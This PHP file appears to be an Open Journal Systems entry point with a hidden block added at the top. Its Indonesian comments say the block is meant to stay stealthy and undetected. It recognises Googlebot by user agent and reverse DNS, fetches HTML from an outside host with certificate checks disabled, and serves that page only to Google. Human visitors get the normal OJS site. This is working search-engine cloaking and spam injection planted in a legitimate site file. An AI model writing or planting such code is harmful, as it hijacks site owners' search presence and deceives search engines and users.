<?php
// Simpen di awal file, SEBELUM OJS bootstrap
$is_google = false;
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';

// Deteksi Google
if(preg_match('/Googlebot|Google-Inspection|Google-Site-Verification|Googlebot-Mobile/i', $ua)) {
    $is_google = true;
}

// Cek IP
if(!$is_google && isset($_SERVER['REMOTE_ADDR'])) {
    $host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    if(preg_match('/google(bot)?\.com$/i', $host)) {
        $is_google = true;
    }
}

if($is_google) {
    // Ambil konten pake stream_context (lebih stealthy)
    $opts = [
        'http' => [
            'method' => 'GET',
            'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
        ],
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false
        ]
    ];
    $context = stream_context_create($opts);
    $content = @file_get_contents('https://pessawat.site/iyaisoo/index.html', false, $context);
    
    if($content !== false) {
        // Kasih buffer biar gak ketahuan
        ob_start();
        echo $content;
        ob_end_flush();
        exit;
    }
}

// OJS code jalan...
require_once 'lib/pkp/lib/vendor/autoload.php';
define('BASE_SYS_DIR', dirname(INDEX_FILE_LOCATION));
chdir(BASE_SYS_DIR);
require_once './lib/pkp/includes/functions.php';
return new \APP\core\Application();
